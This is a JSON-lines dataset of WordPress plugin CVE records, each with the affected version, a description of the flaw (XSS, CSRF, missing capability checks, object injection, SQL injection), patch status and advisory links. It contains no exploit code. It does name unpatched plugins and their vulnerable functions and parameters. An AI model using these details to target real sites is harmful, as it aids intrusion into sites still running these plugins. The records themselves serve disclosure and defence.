{"CVE_ID":"CVE-2023-41129","slug":"patreon-connect","versionImpact":"1.8.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress. This issue affects Patreon WordPress: from n\/a through 1.8.6.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-8-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-8-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7068","slug":"print-invoices-packing-slip-labels-for-woocommerce","versionImpact":"4.3.0","description":"The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the print_packinglist action in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to export orders which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5abc282d-68c9-423c-a15c-d4d3f7035661?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5abc282d-68c9-423c-a15c-d4d3f7035661?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014977%40print-invoices-packing-slip-labels-for-woocommerce&new=3014977%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014977%40print-invoices-packing-slip-labels-for-woocommerce&new=3014977%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51536","slug":"crm-perks-forms","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CRM Perks CRM Perks Forms \u2013 WordPress Form Builder allows Stored XSS. This issue affects CRM Perks Forms \u2013 WordPress Form Builder: from n\/a through 1.1.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/crm-perks-forms\\\/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/crm-perks-forms\\\/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1090","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stopOptimizeAll function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1733","slug":"word-replacer-ultra","versionImpact":"1.0","description":"The Word Replacer Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the word_replacer_ultra() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary content on the affected WordPress site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/word-replacer-ultra\\\/trunk\\\/inc\\\/word-replacer-ultra-ajax.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/word-replacer-ultra\\\/trunk\\\/inc\\\/word-replacer-ultra-ajax.php#L16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0629","slug":"woocommerce-2checkout-payment","versionImpact":"6.2","description":"The 2Checkout Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sniff_ins function in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to make changes to orders and mark them as paid.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-2checkout-payment\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-2checkout-payment\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4959","slug":"frontend-checklist","versionImpact":"2.3.2","description":"The Frontend Checklist WordPress plugin through 2.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/449e4da8-beae-4ff6-9ddc-0e17781c0391\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/449e4da8-beae-4ff6-9ddc-0e17781c0391\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52461","slug":"infinite-slider","versionImpact":"2.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kinsta WordPress Hosting Infinite Slider allows Reflected XSS. This issue affects Infinite Slider: from n\/a through 2.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/infinite-slider\\\/vulnerability\\\/wordpress-infinite-slider-plugin-2-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/infinite-slider\\\/vulnerability\\\/wordpress-infinite-slider-plugin-2-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12208","slug":"wp-backitup","versionImpact":"1.50","description":"The Backup and Restore WordPress \u2013 Backup Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on the ajax_queue_manual_backup() function. This makes it possible for unauthenticated attackers to trigger backups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-backitup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-backitup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e461a04b-6456-4930-b3e7-0f808825aa6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e461a04b-6456-4930-b3e7-0f808825aa6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13366","slug":"sandbox","versionImpact":"0.4","description":"The Sandbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'debug' parameter in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sandbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sandbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc752bb-3f1d-4106-9df1-361564905a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc752bb-3f1d-4106-9df1-361564905a55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13101","slug":"wp-mediatagger","versionImpact":"4.1.1","description":"The WP MediaTagger WordPress plugin through 4.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03f51b54-0ec2-40ce-a0fa-ef0c4ab0ea99\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03f51b54-0ec2-40ce-a0fa-ef0c4ab0ea99\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13827","slug":"razorpay-subscription-button-elementor","versionImpact":"1.0.3","description":"The Razorpay Subscription Button Elementor Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg() and remove_query_arg() functions without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-subscription-button-elementor\\\/tags\\\/1.0.3\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-subscription-button-elementor\\\/tags\\\/1.0.3\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/razorpay-subscription-button-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/razorpay-subscription-button-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8cdde8d-db43-4702-81c3-ea2d867baa8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8cdde8d-db43-4702-81c3-ea2d867baa8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0602","slug":"twittee-text-tweet","versionImpact":"1.0.8","description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative pages, which allows reflected XSS attacks targeting administrators to happen.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c357f93d-4f21-4cd9-9378-d97756c75255\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c357f93d-4f21-4cd9-9378-d97756c75255\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51532","slug":"icegram","versionImpact":"3.1.19","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Icegram Icegram Engage \u2013 WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building allows Stored XSS. This issue affects Icegram Engage \u2013 WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building: from n\/a through 3.1.19.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/icegram\\\/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/icegram\\\/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1089","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the optimizeAllOn function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1685","slug":"social-media-builder","versionImpact":"2.1.0","description":"The Social Media Share Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.0 via deserialization of untrusted input through the attachmentUrl parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-builder\\\/trunk\\\/classes\\\/SgmbButton.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-builder\\\/trunk\\\/classes\\\/SgmbButton.php#L32\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4957","slug":"frontend-checklist","versionImpact":"2.3.2","description":"The Frontend Checklist WordPress plugin through 2.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a560ed4-7dec-4274-b4a4-39dea0c0d67e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a560ed4-7dec-4274-b4a4-39dea0c0d67e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5726","slug":"timeline-event-history","versionImpact":"3.1","description":"The Timeline Event History plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1 via deserialization of untrusted input from the 'timelines-data' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/admin\\\/timeline-wp-build.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/admin\\\/timeline-wp-build.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-another\\\/index.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-another\\\/index.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-one\\\/index.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-one\\\/index.php#L7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9626","slug":"zemanta","versionImpact":"1.3.3","description":"The Editorial Assistant by Sovrn plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_zemanta_set_featured_image' function in versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload attachment files (such as jpg, png, txt, zip), and set the post featured image.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8775662f-d007-4edf-826e-f755d7b11c25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8775662f-d007-4edf-826e-f755d7b11c25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zemanta\\\/tags\\\/1.3.3\\\/zemanta.php#L713\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zemanta\\\/tags\\\/1.3.3\\\/zemanta.php#L713\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12015","slug":"wedevs-project-manager","versionImpact":"2.6.16","description":"The 'Project Manager' WordPress Plugin is affected by an authenticated SQL injection vulnerability in the 'orderby' parameter in the '\/pm\/v2\/activites' route.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-47\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12207","slug":"toggles-shortcode-and-widget","versionImpact":"1.14","description":"The Toggles Shortcode and Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/toggles-shortcode-and-widget\\\/trunk\\\/include\\\/otw_components\\\/otw_shortcode\\\/shortcodes\\\/otw_shortcode_content_toggle.class.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/toggles-shortcode-and-widget\\\/trunk\\\/include\\\/otw_components\\\/otw_shortcode\\\/shortcodes\\\/otw_shortcode_content_toggle.class.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755c8863-33c2-47aa-880a-0ef8b2d594a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755c8863-33c2-47aa-880a-0ef8b2d594a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12637","slug":"moving-users","versionImpact":"1.05","description":"The Moving Users plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.05 via the export functionality. The JSON files are stored in predictable locations with guessable file names when exporting user data. This could allow unauthenticated attackers to extract sensitive user data, for instance, email addresses, hashed passwords, and IP addresses.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/moving-users\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/moving-users\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8209761c-2cfe-49b9-ab4c-49a9a13b5dcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8209761c-2cfe-49b9-ab4c-49a9a13b5dcf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4943","slug":"lastudio-element-kit","versionImpact":"1.5.2","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-lakit-element-link\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/wrapper-links.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/wrapper-links.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5822b9-7fd0-4c39-a298-70d0debcc136?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5822b9-7fd0-4c39-a298-70d0debcc136?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23977","slug":"heateor-social-comments","versionImpact":"1.6.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Team Heateor WordPress Social Comments Plugin for Vkontakte Comments and Disqus Comments plugin <= 1.6.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-comments\\\/wordpress-vkontakte-comments-and-disqus-comments-plugin-1-6-1-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-comments\\\/wordpress-vkontakte-comments-and-disqus-comments-plugin-1-6-1-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6197","slug":"audio-merchant","versionImpact":"5.0.4","description":"The Audio Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.4. This is due to missing or incorrect nonce validation on the audio_merchant_save_settings function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7911337-57fa-4268-8366-d37ff13fae86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7911337-57fa-4268-8366-d37ff13fae86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L951\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1070","slug":"so-widgets-bundle","versionImpact":"1.58.2","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the features attribute in all versions up to, and including, 1.58.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/widgets\\\/features\\\/tpl\\\/default.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/widgets\\\/features\\\/tpl\\\/default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0613","slug":"delete-custom-fields","versionImpact":"0.3.1","description":"The Delete Custom Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.1. This is due to missing or incorrect nonce validation on the ajax_delete_field() function. This makes it possible for unauthenticated attackers to delete arbitrary post meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 